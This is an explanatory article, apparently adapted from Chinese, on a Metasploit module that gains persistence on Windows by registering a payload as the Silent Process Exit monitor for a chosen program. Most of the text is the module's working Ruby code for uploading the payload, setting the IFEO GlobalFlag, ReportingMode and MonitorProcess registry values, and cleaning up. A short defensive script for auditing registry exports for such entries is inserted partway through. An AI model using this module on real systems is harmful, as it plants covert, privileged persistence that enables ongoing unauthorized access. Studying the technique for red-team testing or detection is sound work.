Windows Silent Process Exit Persistence Exploitation Explained

This article walks through how the Windows silent process exit feature is abused for persistence: the Metasploit module code, the registry operations it performs and the overall attack flow. It is intended for red team testing and system security research.

Exploit: Windows Silent Process Exit Persistence

Module overview

This Metasploit module abuses the Windows silent process exit feature to achieve persistence. Windows allows a debug process to be registered that is launched when a given process exits; the module uploads a payload and declares it as the debug process to start when the specified process exits.

Technical details

Initialization

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Windows::Registry
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Exploit::Local::Persistence
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Deprecated
  moved_from 'exploits/windows/local/persistence_image_exec_options'

Module information

  • Name: Windows Silent Process Exit Persistence
  • Description: Windows allows a debug process to be registered that is launched when a process exits. This module uploads a payload and declares it as the debug process to start when the specified process exits.
  • Authors: Mithun Shanbhag, bwatters-r7
  • Platform: Windows
  • Session types: Meterpreter
  • Disclosure date: 2008-06-28

Options

register_options([
  OptString.new('PAYLOAD_NAME',
                [false, '目标主机上使用的载荷文件名(默认为%RAND%.exe)', nil]),
  OptString.new('IMAGE_FILE', [true, '要"调试"的二进制文件', nil])
])

Core implementation

Environment check

def check
  print_warning('位于%TEMP%的载荷仅在重启前有效,建议选择其他位置') if datastore['WritableDir'].start_with?('%TEMP%')
  return CheckCode::Safe("#{writable_dir} 不存在") unless exists?(writable_dir)
  return CheckCode::Safe('必须是System权限才能运行此模块') unless is_system?
  CheckCode::Appears('可能可利用')
end

Payload upload

def upload_payload(dest_pathname)
  payload_exe = generate_payload_exe
  write_file(dest_pathname, payload_exe)
  vprint_status("载荷(#{payload_exe.length} 字节)已上传到 #{sysinfo['Computer']}#{dest_pathname}")
end

Registry operations

def write_reg_keys(image_file, payload_pathname)
  reg_keys = []
  # GlobalFlag 0x200 (512) is FLG_MONITOR_SILENT_PROCESS_EXIT: enables silent-exit monitoring for the image
  reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{image_file}",
                value_name: 'GlobalFlag',
                type: 'REG_DWORD',
                value_value: 512)
  # ReportingMode 1 tells the loader to launch MonitorProcess when the image exits
  reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",
                value_name: 'ReportingMode',
                type: 'REG_DWORD',
                value_value: 1)
  reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",
                value_name: 'MonitorProcess',
                type: 'REG_SZ',
                value_value: payload_pathname)

  # Create the parent SilentProcessExit key if it does not exist yet
  silent_process_exit_key = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit'
  registry_createkey(silent_process_exit_key) unless registry_key_exist?(silent_process_exit_key)

  # Write each value and verify it landed; returns false on the first failure,
  # otherwise the (truthy) array, which the caller uses to decide whether to upload
  reg_keys.each do |key|
    registry_createkey(key[:key_name]) unless registry_key_exist?(key[:key_name])
    vprint_status("写入 #{key[:value_name]}#{key[:key_name]}")
    registry_setvaldata(key[:key_name], key[:value_name], key[:value_value], key[:type])
    unless registry_getvalinfo(key[:key_name], key[:value_name])
      print_error("设置 #{key[:value_name]}#{key[:key_name]} 失败")
      return false
    end
  end
end
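The three values above only take effect together: the IFEO GlobalFlag bit enables monitoring, ReportingMode selects launching the monitor, and MonitorProcess names what runs. From the defender's side that cross-reference is exactly what an audit should check. The following Ruby script is an added example, not code from the module or the page: it parses a constructed `.reg` export of both hives and reports every image with a monitor process registered, distinguishing fully armed entries from ones where a bit is missing.

```ruby
# Added example, not part of the module: audit a .reg export of the two hives
# the module writes and flag images with a silent-exit monitor registered.
IFEO_PREFIX = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"
SPE_PREFIX  = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\"
FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200 # GlobalFlag bit the module sets (512)
LAUNCH_MONITOR_PROCESS = 0x1            # ReportingMode bit that launches MonitorProcess
# Constructed sample export: notepad.exe is fully armed; calc.exe has only a
# dump-on-exit ReportingMode (2) and no IFEO GlobalFlag, so it never fires.
SAMPLE_REG_EXPORT = <<~'REG'
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
  "GlobalFlag"=dword:00000200
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
  "ReportingMode"=dword:00000001
  "MonitorProcess"="C:\\Users\\Public\\updater.exe"
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe]
  "ReportingMode"=dword:00000002
  "MonitorProcess"="C:\\Tools\\procdump.exe"
REG
# Parse a .reg export into { key_path => { value_name => value } }; decodes dword and string values.
def parse_reg_export(text)
  keys = {}
  current = nil
  text.each_line do |raw_line|
    line = raw_line.strip
    if (m = line.match(/\A\[(.+)\]\z/))
      current = keys[m[1]] = {}
    elsif current && (m = line.match(/\A"([^"]+)"=(.+)\z/))
      name, raw = m[1], m[2]
      current[name] =
        if raw =~ /\Adword:([0-9a-f]{1,8})\z/i then $1.to_i(16)
        elsif raw =~ /\A"(.*)"\z/ then $1.gsub('\\\\') { '\\' } # .reg doubles backslashes
        else raw
        end
    end
  end
  keys
end
# Cross-reference both hives: the monitor launches only when GlobalFlag has
# FLG_MONITOR_SILENT_PROCESS_EXIT set and ReportingMode has LAUNCH_MONITOR_PROCESS set.
def find_silent_exit_monitors(keys)
  keys.map do |path, values|
    next unless path.start_with?(SPE_PREFIX)
    monitor = values['MonitorProcess'].to_s
    next if monitor.empty?
    image = path[SPE_PREFIX.length..-1]
    flag = (keys[IFEO_PREFIX + image] || {})['GlobalFlag'].to_i
    armed = (flag & FLG_MONITOR_SILENT_PROCESS_EXIT) != 0 &&
            (values['ReportingMode'].to_i & LAUNCH_MONITOR_PROCESS) != 0
    { image: image, monitor: monitor, armed: armed }
  end.compact
end
```

Feed it the output of `reg export` for both keys on a host under investigation; any `armed` entry whose MonitorProcess is not a known crash-dump or diagnostics tool deserves a closer look.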

Persistence installation

def install_persistence
  validate_active_host
  payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(rand(6..13))
  temp_path = writable_dir
  image_file = datastore['IMAGE_FILE']
  payload_pathname = temp_path + '\\' + payload_name + '.exe'

  vprint_status("载荷路径 = #{payload_pathname}")
  # Only upload once all three registry values were written successfully
  upload_payload(payload_pathname) if write_reg_keys(image_file, payload_pathname)

  # Clean-up script: remove the payload and the three registry values
  @clean_up_rc << "rm #{payload_pathname}\n"
  @clean_up_rc << "execute -f cmd.exe -a \"/c reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{image_file}\" /v GlobalFlag /f\" -H\n"
  @clean_up_rc << "execute -f cmd.exe -a \"/c reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}\" /v ReportingMode /f\" -H\n"
  @clean_up_rc << "execute -f cmd.exe -a \"/c reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}\" /v MonitorProcess /f\" -H\n"
end

Key points

  • Abuses the Windows Image File Execution Options (IFEO) mechanism
  • Configures silent process exit monitoring through the registry
  • Requires SYSTEM-level privileges
  • Supports automatic cleanup
  • Works with Meterpreter sessions

References

  • ATT&CK technique: T1183 Image File Execution Options Injection
  • Related documentation: Microsoft blog post describing IFEO in detail